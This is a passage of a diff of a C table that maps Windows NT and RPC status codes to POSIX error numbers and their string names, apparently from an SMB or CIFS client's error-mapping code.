+-	"STATUS_NOT_SUPPORTED_ON_SBS"},
+-	{STATUS_WMI_GUID_DISCONNECTED, -EIO, "STATUS_WMI_GUID_DISCONNECTED"},
+-	{STATUS_WMI_ALREADY_DISABLED, -EIO, "STATUS_WMI_ALREADY_DISABLED"},
+-	{STATUS_WMI_ALREADY_ENABLED, -EIO, "STATUS_WMI_ALREADY_ENABLED"},
+-	{STATUS_MFT_TOO_FRAGMENTED, -EIO, "STATUS_MFT_TOO_FRAGMENTED"},
+-	{STATUS_COPY_PROTECTION_FAILURE, -EIO,
+-	"STATUS_COPY_PROTECTION_FAILURE"},
+-	{STATUS_CSS_AUTHENTICATION_FAILURE, -EIO,
+-	"STATUS_CSS_AUTHENTICATION_FAILURE"},
+-	{STATUS_CSS_KEY_NOT_PRESENT, -EIO, "STATUS_CSS_KEY_NOT_PRESENT"},
+-	{STATUS_CSS_KEY_NOT_ESTABLISHED, -EIO,
+-	"STATUS_CSS_KEY_NOT_ESTABLISHED"},
+-	{STATUS_CSS_SCRAMBLED_SECTOR, -EIO, "STATUS_CSS_SCRAMBLED_SECTOR"},
+-	{STATUS_CSS_REGION_MISMATCH, -EIO, "STATUS_CSS_REGION_MISMATCH"},
+-	{STATUS_CSS_RESETS_EXHAUSTED, -EIO, "STATUS_CSS_RESETS_EXHAUSTED"},
+-	{STATUS_PKINIT_FAILURE, -EIO, "STATUS_PKINIT_FAILURE"},
+-	{STATUS_SMARTCARD_SUBSYSTEM_FAILURE, -EIO,
+-	"STATUS_SMARTCARD_SUBSYSTEM_FAILURE"},
+-	{STATUS_NO_KERB_KEY, -EIO, "STATUS_NO_KERB_KEY"},
+-	{STATUS_HOST_DOWN, -EIO, "STATUS_HOST_DOWN"},
+-	{STATUS_UNSUPPORTED_PREAUTH, -EIO, "STATUS_UNSUPPORTED_PREAUTH"},
+-	{STATUS_EFS_ALG_BLOB_TOO_BIG, -EIO, "STATUS_EFS_ALG_BLOB_TOO_BIG"},
+-	{STATUS_PORT_NOT_SET, -EIO, "STATUS_PORT_NOT_SET"},
+-	{STATUS_DEBUGGER_INACTIVE, -EIO, "STATUS_DEBUGGER_INACTIVE"},
+-	{STATUS_DS_VERSION_CHECK_FAILURE, -EIO,
+-	"STATUS_DS_VERSION_CHECK_FAILURE"},
+-	{STATUS_AUDITING_DISABLED, -EIO, "STATUS_AUDITING_DISABLED"},
+-	{STATUS_PRENT4_MACHINE_ACCOUNT, -EIO, "STATUS_PRENT4_MACHINE_ACCOUNT"},
+-	{STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER, -EIO,
+-	"STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER"},
+-	{STATUS_INVALID_IMAGE_WIN_32, -EIO, "STATUS_INVALID_IMAGE_WIN_32"},
+-	{STATUS_INVALID_IMAGE_WIN_64, -EIO, "STATUS_INVALID_IMAGE_WIN_64"},
+-	{STATUS_BAD_BINDINGS, -EIO, "STATUS_BAD_BINDINGS"},
+-	{STATUS_NETWORK_SESSION_EXPIRED, -EIO,
+-	"STATUS_NETWORK_SESSION_EXPIRED"},
+-	{STATUS_APPHELP_BLOCK, -EIO, "STATUS_APPHELP_BLOCK"},
+-	{STATUS_ALL_SIDS_FILTERED, -EIO, "STATUS_ALL_SIDS_FILTERED"},
+-	{STATUS_NOT_SAFE_MODE_DRIVER, -EIO, "STATUS_NOT_SAFE_MODE_DRIVER"},
+-	{STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT, -EACCES,
+-	"STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT"},
+-	{STATUS_ACCESS_DISABLED_BY_POLICY_PATH, -EACCES,
+-	"STATUS_ACCESS_DISABLED_BY_POLICY_PATH"},
+-	{STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER, -EACCES,
+-	"STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER"},
+-	{STATUS_ACCESS_DISABLED_BY_POLICY_OTHER, -EACCES,
+-	"STATUS_ACCESS_DISABLED_BY_POLICY_OTHER"},
+-	{STATUS_FAILED_DRIVER_ENTRY, -EIO, "STATUS_FAILED_DRIVER_ENTRY"},
+-	{STATUS_DEVICE_ENUMERATION_ERROR, -EIO,
+-	"STATUS_DEVICE_ENUMERATION_ERROR"},
+-	{STATUS_MOUNT_POINT_NOT_RESOLVED, -EIO,
+-	"STATUS_MOUNT_POINT_NOT_RESOLVED"},
+-	{STATUS_INVALID_DEVICE_OBJECT_PARAMETER, -EIO,
+-	"STATUS_INVALID_DEVICE_OBJECT_PARAMETER"},
+-	{STATUS_MCA_OCCURED, -EIO, "STATUS_MCA_OCCURED"},
+-	{STATUS_DRIVER_BLOCKED_CRITICAL, -EIO,
+-	"STATUS_DRIVER_BLOCKED_CRITICAL"},
+-	{STATUS_DRIVER_BLOCKED, -EIO, "STATUS_DRIVER_BLOCKED"},
+-	{STATUS_DRIVER_DATABASE_ERROR, -EIO, "STATUS_DRIVER_DATABASE_ERROR"},
+-	{STATUS_SYSTEM_HIVE_TOO_LARGE, -EIO, "STATUS_SYSTEM_HIVE_TOO_LARGE"},
+-	{STATUS_INVALID_IMPORT_OF_NON_DLL, -EIO,
+-	"STATUS_INVALID_IMPORT_OF_NON_DLL"},
+-	{STATUS_NO_SECRETS, -EIO, "STATUS_NO_SECRETS"},
+-	{STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY, -EACCES,
+-	"STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY"},
+-	{STATUS_FAILED_STACK_SWITCH, -EIO, "STATUS_FAILED_STACK_SWITCH"},
+-	{STATUS_HEAP_CORRUPTION, -EIO, "STATUS_HEAP_CORRUPTION"},
+-	{STATUS_SMARTCARD_WRONG_PIN, -EIO, "STATUS_SMARTCARD_WRONG_PIN"},
+-	{STATUS_SMARTCARD_CARD_BLOCKED, -EIO, "STATUS_SMARTCARD_CARD_BLOCKED"},
+-	{STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED, -EIO,
+-	"STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED"},
+-	{STATUS_SMARTCARD_NO_CARD, -EIO, "STATUS_SMARTCARD_NO_CARD"},
+-	{STATUS_SMARTCARD_NO_KEY_CONTAINER, -EIO,
+-	"STATUS_SMARTCARD_NO_KEY_CONTAINER"},
+-	{STATUS_SMARTCARD_NO_CERTIFICATE, -EIO,
+-	"STATUS_SMARTCARD_NO_CERTIFICATE"},
+-	{STATUS_SMARTCARD_NO_KEYSET, -EIO, "STATUS_SMARTCARD_NO_KEYSET"},
+-	{STATUS_SMARTCARD_IO_ERROR, -EIO, "STATUS_SMARTCARD_IO_ERROR"},
+-	{STATUS_DOWNGRADE_DETECTED, -EIO, "STATUS_DOWNGRADE_DETECTED"},
+-	{STATUS_SMARTCARD_CERT_REVOKED, -EIO, "STATUS_SMARTCARD_CERT_REVOKED"},
+-	{STATUS_ISSUING_CA_UNTRUSTED, -EIO, "STATUS_ISSUING_CA_UNTRUSTED"},
+-	{STATUS_REVOCATION_OFFLINE_C, -EIO, "STATUS_REVOCATION_OFFLINE_C"},
+-	{STATUS_PKINIT_CLIENT_FAILURE, -EIO, "STATUS_PKINIT_CLIENT_FAILURE"},
+-	{STATUS_SMARTCARD_CERT_EXPIRED, -EIO, "STATUS_SMARTCARD_CERT_EXPIRED"},
+-	{STATUS_DRIVER_FAILED_PRIOR_UNLOAD, -EIO,
+-	"STATUS_DRIVER_FAILED_PRIOR_UNLOAD"},
+-	{STATUS_SMARTCARD_SILENT_CONTEXT, -EIO,
+-	"STATUS_SMARTCARD_SILENT_CONTEXT"},
+-	{STATUS_PER_USER_TRUST_QUOTA_EXCEEDED, -EDQUOT,
+-	"STATUS_PER_USER_TRUST_QUOTA_EXCEEDED"},
+-	{STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED, -EDQUOT,
+-	"STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED"},
+-	{STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED, -EDQUOT,
+-	"STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED"},
+-	{STATUS_DS_NAME_NOT_UNIQUE, -EIO, "STATUS_DS_NAME_NOT_UNIQUE"},
+-	{STATUS_DS_DUPLICATE_ID_FOUND, -EIO, "STATUS_DS_DUPLICATE_ID_FOUND"},
+-	{STATUS_DS_GROUP_CONVERSION_ERROR, -EIO,
+-	"STATUS_DS_GROUP_CONVERSION_ERROR"},
+-	{STATUS_VOLSNAP_PREPARE_HIBERNATE, -EIO,
+-	"STATUS_VOLSNAP_PREPARE_HIBERNATE"},
+-	{STATUS_USER2USER_REQUIRED, -EIO, "STATUS_USER2USER_REQUIRED"},
+-	{STATUS_STACK_BUFFER_OVERRUN, -EIO, "STATUS_STACK_BUFFER_OVERRUN"},
+-	{STATUS_NO_S4U_PROT_SUPPORT, -EIO, "STATUS_NO_S4U_PROT_SUPPORT"},
+-	{STATUS_CROSSREALM_DELEGATION_FAILURE, -EIO,
+-	"STATUS_CROSSREALM_DELEGATION_FAILURE"},
+-	{STATUS_REVOCATION_OFFLINE_KDC, -EIO, "STATUS_REVOCATION_OFFLINE_KDC"},
+-	{STATUS_ISSUING_CA_UNTRUSTED_KDC, -EIO,
+-	"STATUS_ISSUING_CA_UNTRUSTED_KDC"},
+-	{STATUS_KDC_CERT_EXPIRED, -EIO, "STATUS_KDC_CERT_EXPIRED"},
+-	{STATUS_KDC_CERT_REVOKED, -EIO, "STATUS_KDC_CERT_REVOKED"},
+-	{STATUS_PARAMETER_QUOTA_EXCEEDED, -EDQUOT,
+-	"STATUS_PARAMETER_QUOTA_EXCEEDED"},
+-	{STATUS_HIBERNATION_FAILURE, -EIO, "STATUS_HIBERNATION_FAILURE"},
+-	{STATUS_DELAY_LOAD_FAILED, -EIO, "STATUS_DELAY_LOAD_FAILED"},
+-	{STATUS_AUTHENTICATION_FIREWALL_FAILED, -EIO,
+-	"STATUS_AUTHENTICATION_FIREWALL_FAILED"},
+-	{STATUS_VDM_DISALLOWED, -EIO, "STATUS_VDM_DISALLOWED"},
+-	{STATUS_HUNG_DISPLAY_DRIVER_THREAD, -EIO,
+-	"STATUS_HUNG_DISPLAY_DRIVER_THREAD"},
+-	{STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE, -EIO,
+-	"STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE"},
+-	{STATUS_INVALID_CRUNTIME_PARAMETER, -EIO,
+-	"STATUS_INVALID_CRUNTIME_PARAMETER"},
+-	{STATUS_NTLM_BLOCKED, -EIO, "STATUS_NTLM_BLOCKED"},
+-	{STATUS_ASSERTION_FAILURE, -EIO, "STATUS_ASSERTION_FAILURE"},
+-	{STATUS_VERIFIER_STOP, -EIO, "STATUS_VERIFIER_STOP"},
+-	{STATUS_CALLBACK_POP_STACK, -EIO, "STATUS_CALLBACK_POP_STACK"},
+-	{STATUS_INCOMPATIBLE_DRIVER_BLOCKED, -EIO,
+-	"STATUS_INCOMPATIBLE_DRIVER_BLOCKED"},
+-	{STATUS_HIVE_UNLOADED, -EIO, "STATUS_HIVE_UNLOADED"},
+-	{STATUS_COMPRESSION_DISABLED, -EIO, "STATUS_COMPRESSION_DISABLED"},
+-	{STATUS_FILE_SYSTEM_LIMITATION, -EIO, "STATUS_FILE_SYSTEM_LIMITATION"},
+-	{STATUS_INVALID_IMAGE_HASH, -EIO, "STATUS_INVALID_IMAGE_HASH"},
+-	{STATUS_NOT_CAPABLE, -EIO, "STATUS_NOT_CAPABLE"},
+-	{STATUS_REQUEST_OUT_OF_SEQUENCE, -EIO,
+-	"STATUS_REQUEST_OUT_OF_SEQUENCE"},
+-	{STATUS_IMPLEMENTATION_LIMIT, -EIO, "STATUS_IMPLEMENTATION_LIMIT"},
+-	{STATUS_ELEVATION_REQUIRED, -EIO, "STATUS_ELEVATION_REQUIRED"},
+-	{STATUS_BEYOND_VDL, -EIO, "STATUS_BEYOND_VDL"},
+-	{STATUS_ENCOUNTERED_WRITE_IN_PROGRESS, -EIO,
+-	"STATUS_ENCOUNTERED_WRITE_IN_PROGRESS"},
+-	{STATUS_PTE_CHANGED, -EIO, "STATUS_PTE_CHANGED"},
+-	{STATUS_PURGE_FAILED, -EIO, "STATUS_PURGE_FAILED"},
+-	{STATUS_CRED_REQUIRES_CONFIRMATION, -EIO,
+-	"STATUS_CRED_REQUIRES_CONFIRMATION"},
+-	{STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE, -EIO,
+-	"STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE"},
+-	{STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER, -EIO,
+-	"STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER"},
+-	{STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE, -EIO,
+-	"STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE"},
+-	{STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE, -EIO,
+-	"STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE"},
+-	{STATUS_CS_ENCRYPTION_FILE_NOT_CSE, -EIO,
+-	"STATUS_CS_ENCRYPTION_FILE_NOT_CSE"},
+-	{STATUS_INVALID_LABEL, -EIO, "STATUS_INVALID_LABEL"},
+-	{STATUS_DRIVER_PROCESS_TERMINATED, -EIO,
+-	"STATUS_DRIVER_PROCESS_TERMINATED"},
+-	{STATUS_AMBIGUOUS_SYSTEM_DEVICE, -EIO,
+-	"STATUS_AMBIGUOUS_SYSTEM_DEVICE"},
+-	{STATUS_SYSTEM_DEVICE_NOT_FOUND, -EIO,
+-	"STATUS_SYSTEM_DEVICE_NOT_FOUND"},
+-	{STATUS_RESTART_BOOT_APPLICATION, -EIO,
+-	"STATUS_RESTART_BOOT_APPLICATION"},
+-	{STATUS_INVALID_TASK_NAME, -EIO, "STATUS_INVALID_TASK_NAME"},
+-	{STATUS_INVALID_TASK_INDEX, -EIO, "STATUS_INVALID_TASK_INDEX"},
+-	{STATUS_THREAD_ALREADY_IN_TASK, -EIO, "STATUS_THREAD_ALREADY_IN_TASK"},
+-	{STATUS_CALLBACK_BYPASS, -EIO, "STATUS_CALLBACK_BYPASS"},
+-	{STATUS_PORT_CLOSED, -EIO, "STATUS_PORT_CLOSED"},
+-	{STATUS_MESSAGE_LOST, -EIO, "STATUS_MESSAGE_LOST"},
+-	{STATUS_INVALID_MESSAGE, -EIO, "STATUS_INVALID_MESSAGE"},
+-	{STATUS_REQUEST_CANCELED, -EIO, "STATUS_REQUEST_CANCELED"},
+-	{STATUS_RECURSIVE_DISPATCH, -EIO, "STATUS_RECURSIVE_DISPATCH"},
+-	{STATUS_LPC_RECEIVE_BUFFER_EXPECTED, -EIO,
+-	"STATUS_LPC_RECEIVE_BUFFER_EXPECTED"},
+-	{STATUS_LPC_INVALID_CONNECTION_USAGE, -EIO,
+-	"STATUS_LPC_INVALID_CONNECTION_USAGE"},
+-	{STATUS_LPC_REQUESTS_NOT_ALLOWED, -EIO,
+-	"STATUS_LPC_REQUESTS_NOT_ALLOWED"},
+-	{STATUS_RESOURCE_IN_USE, -EIO, "STATUS_RESOURCE_IN_USE"},
+-	{STATUS_HARDWARE_MEMORY_ERROR, -EIO, "STATUS_HARDWARE_MEMORY_ERROR"},
+-	{STATUS_THREADPOOL_HANDLE_EXCEPTION, -EIO,
+-	"STATUS_THREADPOOL_HANDLE_EXCEPTION"},
+-	{STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED, -EIO,
+-	"STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED"},
+-	{STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED, -EIO,
+-	"STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED"},
+-	{STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED, -EIO,
+-	"STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED"},
+-	{STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED, -EIO,
+-	"STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED"},
+-	{STATUS_THREADPOOL_RELEASED_DURING_OPERATION, -EIO,
+-	"STATUS_THREADPOOL_RELEASED_DURING_OPERATION"},
+-	{STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING, -EIO,
+-	"STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING"},
+-	{STATUS_APC_RETURNED_WHILE_IMPERSONATING, -EIO,
+-	"STATUS_APC_RETURNED_WHILE_IMPERSONATING"},
+-	{STATUS_PROCESS_IS_PROTECTED, -EIO, "STATUS_PROCESS_IS_PROTECTED"},
+-	{STATUS_MCA_EXCEPTION, -EIO, "STATUS_MCA_EXCEPTION"},
+-	{STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE, -EIO,
+-	"STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE"},
+-	{STATUS_SYMLINK_CLASS_DISABLED, -EIO, "STATUS_SYMLINK_CLASS_DISABLED"},
+-	{STATUS_INVALID_IDN_NORMALIZATION, -EIO,
+-	"STATUS_INVALID_IDN_NORMALIZATION"},
+-	{STATUS_NO_UNICODE_TRANSLATION, -EIO, "STATUS_NO_UNICODE_TRANSLATION"},
+-	{STATUS_ALREADY_REGISTERED, -EIO, "STATUS_ALREADY_REGISTERED"},
+-	{STATUS_CONTEXT_MISMATCH, -EIO, "STATUS_CONTEXT_MISMATCH"},
+-	{STATUS_PORT_ALREADY_HAS_COMPLETION_LIST, -EIO,
+-	"STATUS_PORT_ALREADY_HAS_COMPLETION_LIST"},
+-	{STATUS_CALLBACK_RETURNED_THREAD_PRIORITY, -EIO,
+-	"STATUS_CALLBACK_RETURNED_THREAD_PRIORITY"},
+-	{STATUS_INVALID_THREAD, -EIO, "STATUS_INVALID_THREAD"},
+-	{STATUS_CALLBACK_RETURNED_TRANSACTION, -EIO,
+-	"STATUS_CALLBACK_RETURNED_TRANSACTION"},
+-	{STATUS_CALLBACK_RETURNED_LDR_LOCK, -EIO,
+-	"STATUS_CALLBACK_RETURNED_LDR_LOCK"},
+-	{STATUS_CALLBACK_RETURNED_LANG, -EIO, "STATUS_CALLBACK_RETURNED_LANG"},
+-	{STATUS_CALLBACK_RETURNED_PRI_BACK, -EIO,
+-	"STATUS_CALLBACK_RETURNED_PRI_BACK"},
+-	{STATUS_CALLBACK_RETURNED_THREAD_AFFINITY, -EIO,
+-	"STATUS_CALLBACK_RETURNED_THREAD_AFFINITY"},
+-	{STATUS_DISK_REPAIR_DISABLED, -EIO, "STATUS_DISK_REPAIR_DISABLED"},
+-	{STATUS_DS_DOMAIN_RENAME_IN_PROGRESS, -EIO,
+-	"STATUS_DS_DOMAIN_RENAME_IN_PROGRESS"},
+-	{STATUS_DISK_QUOTA_EXCEEDED, -EDQUOT, "STATUS_DISK_QUOTA_EXCEEDED"},
+-	{STATUS_CONTENT_BLOCKED, -EIO, "STATUS_CONTENT_BLOCKED"},
+-	{STATUS_BAD_CLUSTERS, -EIO, "STATUS_BAD_CLUSTERS"},
+-	{STATUS_VOLUME_DIRTY, -EIO, "STATUS_VOLUME_DIRTY"},
+-	{STATUS_FILE_CHECKED_OUT, -EIO, "STATUS_FILE_CHECKED_OUT"},
+-	{STATUS_CHECKOUT_REQUIRED, -EIO, "STATUS_CHECKOUT_REQUIRED"},
+-	{STATUS_BAD_FILE_TYPE, -EIO, "STATUS_BAD_FILE_TYPE"},
+-	{STATUS_FILE_TOO_LARGE, -EIO, "STATUS_FILE_TOO_LARGE"},
+-	{STATUS_FORMS_AUTH_REQUIRED, -EIO, "STATUS_FORMS_AUTH_REQUIRED"},
+-	{STATUS_VIRUS_INFECTED, -EIO, "STATUS_VIRUS_INFECTED"},
+-	{STATUS_VIRUS_DELETED, -EIO, "STATUS_VIRUS_DELETED"},
+-	{STATUS_BAD_MCFG_TABLE, -EIO, "STATUS_BAD_MCFG_TABLE"},
+-	{STATUS_WOW_ASSERTION, -EIO, "STATUS_WOW_ASSERTION"},
+-	{STATUS_INVALID_SIGNATURE, -EIO, "STATUS_INVALID_SIGNATURE"},
+-	{STATUS_HMAC_NOT_SUPPORTED, -EIO, "STATUS_HMAC_NOT_SUPPORTED"},
+-	{STATUS_IPSEC_QUEUE_OVERFLOW, -EIO, "STATUS_IPSEC_QUEUE_OVERFLOW"},
+-	{STATUS_ND_QUEUE_OVERFLOW, -EIO, "STATUS_ND_QUEUE_OVERFLOW"},
+-	{STATUS_HOPLIMIT_EXCEEDED, -EIO, "STATUS_HOPLIMIT_EXCEEDED"},
+-	{STATUS_PROTOCOL_NOT_SUPPORTED, -EOPNOTSUPP,
+-	"STATUS_PROTOCOL_NOT_SUPPORTED"},
+-	{STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED, -EIO,
+-	"STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED"},
+-	{STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR, -EIO,
+-	"STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR"},
+-	{STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR, -EIO,
+-	"STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR"},
+-	{STATUS_XML_PARSE_ERROR, -EIO, "STATUS_XML_PARSE_ERROR"},
+-	{STATUS_XMLDSIG_ERROR, -EIO, "STATUS_XMLDSIG_ERROR"},
+-	{STATUS_WRONG_COMPARTMENT, -EIO, "STATUS_WRONG_COMPARTMENT"},
+-	{STATUS_AUTHIP_FAILURE, -EIO, "STATUS_AUTHIP_FAILURE"},
+-	{DBG_NO_STATE_CHANGE, -EIO, "DBG_NO_STATE_CHANGE"},
+-	{DBG_APP_NOT_IDLE, -EIO, "DBG_APP_NOT_IDLE"},
+-	{RPC_NT_INVALID_STRING_BINDING, -EIO, "RPC_NT_INVALID_STRING_BINDING"},
+-	{RPC_NT_WRONG_KIND_OF_BINDING, -EIO, "RPC_NT_WRONG_KIND_OF_BINDING"},
+-	{RPC_NT_INVALID_BINDING, -EIO, "RPC_NT_INVALID_BINDING"},
+-	{RPC_NT_PROTSEQ_NOT_SUPPORTED, -EOPNOTSUPP,
+-	"RPC_NT_PROTSEQ_NOT_SUPPORTED"},
+-	{RPC_NT_INVALID_RPC_PROTSEQ, -EIO, "RPC_NT_INVALID_RPC_PROTSEQ"},
+-	{RPC_NT_INVALID_STRING_UUID, -EIO, "RPC_NT_INVALID_STRING_UUID"},
+-	{RPC_NT_INVALID_ENDPOINT_FORMAT, -EIO,
+-	"RPC_NT_INVALID_ENDPOINT_FORMAT"},
+-	{RPC_NT_INVALID_NET_ADDR, -EIO, "RPC_NT_INVALID_NET_ADDR"},
+-	{RPC_NT_NO_ENDPOINT_FOUND, -EIO, "RPC_NT_NO_ENDPOINT_FOUND"},
+-	{RPC_NT_INVALID_TIMEOUT, -EINVAL, "RPC_NT_INVALID_TIMEOUT"},
+-	{RPC_NT_OBJECT_NOT_FOUND, -ENOENT, "RPC_NT_OBJECT_NOT_FOUND"},
+-	{RPC_NT_ALREADY_REGISTERED, -EIO, "RPC_NT_ALREADY_REGISTERED"},
+-	{RPC_NT_TYPE_ALREADY_REGISTERED, -EIO,
+-	"RPC_NT_TYPE_ALREADY_REGISTERED"},
+-	{RPC_NT_ALREADY_LISTENING, -EIO, "RPC_NT_ALREADY_LISTENING"},
+-	{RPC_NT_NO_PROTSEQS_REGISTERED, -EIO, "RPC_NT_NO_PROTSEQS_REGISTERED"},
+-	{RPC_NT_NOT_LISTENING, -EIO, "RPC_NT_NOT_LISTENING"},
+-	{RPC_NT_UNKNOWN_MGR_TYPE, -EIO, "RPC_NT_UNKNOWN_MGR_TYPE"},
+-	{RPC_NT_UNKNOWN_IF, -EIO, "RPC_NT_UNKNOWN_IF"},
+-	{RPC_NT_NO_BINDINGS, -EIO, "RPC_NT_NO_BINDINGS"},
+-	{RPC_NT_NO_PROTSEQS, -EIO, "RPC_NT_NO_PROTSEQS"},
+-	{RPC_NT_CANT_CREATE_ENDPOINT, -EIO, "RPC_NT_CANT_CREATE_ENDPOINT"},
+-	{RPC_NT_OUT_OF_RESOURCES, -EIO, "RPC_NT_OUT_OF_RESOURCES"},
+-	{RPC_NT_SERVER_UNAVAILABLE, -EIO, "RPC_NT_SERVER_UNAVAILABLE"},
+-	{RPC_NT_SERVER_TOO_BUSY, -EBUSY, "RPC_NT_SERVER_TOO_BUSY"},
+-	{RPC_NT_INVALID_NETWORK_OPTIONS, -EIO,
+-	"RPC_NT_INVALID_NETWORK_OPTIONS"},
+-	{RPC_NT_NO_CALL_ACTIVE, -EIO, "RPC_NT_NO_CALL_ACTIVE"},
+-	{RPC_NT_CALL_FAILED, -EIO, "RPC_NT_CALL_FAILED"},
+-	{RPC_NT_CALL_FAILED_DNE, -EIO, "RPC_NT_CALL_FAILED_DNE"},
+-	{RPC_NT_PROTOCOL_ERROR, -EIO, "RPC_NT_PROTOCOL_ERROR"},
+-	{RPC_NT_UNSUPPORTED_TRANS_SYN, -EIO, "RPC_NT_UNSUPPORTED_TRANS_SYN"},
+-	{RPC_NT_UNSUPPORTED_TYPE, -EIO, "RPC_NT_UNSUPPORTED_TYPE"},
+-	{RPC_NT_INVALID_TAG, -EIO, "RPC_NT_INVALID_TAG"},
+-	{RPC_NT_INVALID_BOUND, -EIO, "RPC_NT_INVALID_BOUND"},
+-	{RPC_NT_NO_ENTRY_NAME, -EIO, "RPC_NT_NO_ENTRY_NAME"},
+-	{RPC_NT_INVALID_NAME_SYNTAX, -EIO, "RPC_NT_INVALID_NAME_SYNTAX"},
+-	{RPC_NT_UNSUPPORTED_NAME_SYNTAX, -EIO,
+-	"RPC_NT_UNSUPPORTED_NAME_SYNTAX"},
+-	{RPC_NT_UUID_NO_ADDRESS, -EIO, "RPC_NT_UUID_NO_ADDRESS"},
+-	{RPC_NT_DUPLICATE_ENDPOINT, -ENOTUNIQ, "RPC_NT_DUPLICATE_ENDPOINT"},
+-	{RPC_NT_UNKNOWN_AUTHN_TYPE, -EIO, "RPC_NT_UNKNOWN_AUTHN_TYPE"},
+-	{RPC_NT_MAX_CALLS_TOO_SMALL, -EIO, "RPC_NT_MAX_CALLS_TOO_SMALL"},
+-	{RPC_NT_STRING_TOO_LONG, -EIO, "RPC_NT_STRING_TOO_LONG"},
+-	{RPC_NT_PROTSEQ_NOT_FOUND, -EIO, "RPC_NT_PROTSEQ_NOT_FOUND"},
+-	{RPC_NT_PROCNUM_OUT_OF_RANGE, -EIO, "RPC_NT_PROCNUM_OUT_OF_RANGE"},
+-	{RPC_NT_BINDING_HAS_NO_AUTH, -EIO, "RPC_NT_BINDING_HAS_NO_AUTH"},
+-	{RPC_NT_UNKNOWN_AUTHN_SERVICE, -EIO, "RPC_NT_UNKNOWN_AUTHN_SERVICE"},
+-	{RPC_NT_UNKNOWN_AUTHN_LEVEL, -EIO, "RPC_NT_UNKNOWN_AUTHN_LEVEL"},
+-	{RPC_NT_INVALID_AUTH_IDENTITY, -EIO, "RPC_NT_INVALID_AUTH_IDENTITY"},
+-	{RPC_NT_UNKNOWN_AUTHZ_SERVICE, -EIO, "RPC_NT_UNKNOWN_AUTHZ_SERVICE"},
+-	{EPT_NT_INVALID_ENTRY, -EIO, "EPT_NT_INVALID_ENTRY"},
+-	{EPT_NT_CANT_PERFORM_OP, -EIO, "EPT_NT_CANT_PERFORM_OP"},
+-	{EPT_NT_NOT_REGISTERED, -EIO, "EPT_NT_NOT_REGISTERED"},
+-	{RPC_NT_NOTHING_TO_EXPORT, -EIO, "RPC_NT_NOTHING_TO_EXPORT"},
+-	{RPC_NT_INCOMPLETE_NAME, -EIO, "RPC_NT_INCOMPLETE_NAME"},
+-	{RPC_NT_INVALID_VERS_OPTION, -EIO, "RPC_NT_INVALID_VERS_OPTION"},
+-	{RPC_NT_NO_MORE_MEMBERS, -EIO, "RPC_NT_NO_MORE_MEMBERS"},
+-	{RPC_NT_NOT_ALL_OBJS_UNEXPORTED, -EIO,
+-	"RPC_NT_NOT_ALL_OBJS_UNEXPORTED"},
+-	{RPC_NT_INTERFACE_NOT_FOUND, -EIO, "RPC_NT_INTERFACE_NOT_FOUND"},
+-	{RPC_NT_ENTRY_ALREADY_EXISTS, -EIO, "RPC_NT_ENTRY_ALREADY_EXISTS"},
+-	{RPC_NT_ENTRY_NOT_FOUND, -EIO, "RPC_NT_ENTRY_NOT_FOUND"},
+-	{RPC_NT_NAME_SERVICE_UNAVAILABLE, -EIO,
+-	"RPC_NT_NAME_SERVICE_UNAVAILABLE"},
+-	{RPC_NT_INVALID_NAF_ID, -EIO, "RPC_NT_INVALID_NAF_ID"},
+-	{RPC_NT_CANNOT_SUPPORT, -EOPNOTSUPP, "RPC_NT_CANNOT_SUPPORT"},
+-	{RPC_NT_NO_CONTEXT_AVAILABLE, -EIO, "RPC_NT_NO_CONTEXT_AVAILABLE"},
+-	{RPC_NT_INTERNAL_ERROR, -EIO, "RPC_NT_INTERNAL_ERROR"},
+-	{RPC_NT_ZERO_DIVIDE, -EIO, "RPC_NT_ZERO_DIVIDE"},
+-	{RPC_NT_ADDRESS_ERROR, -EIO, "RPC_NT_ADDRESS_ERROR"},
+-	{RPC_NT_FP_DIV_ZERO, -EIO, "RPC_NT_FP_DIV_ZERO"},
+-	{RPC_NT_FP_UNDERFLOW, -EIO, "RPC_NT_FP_UNDERFLOW"},
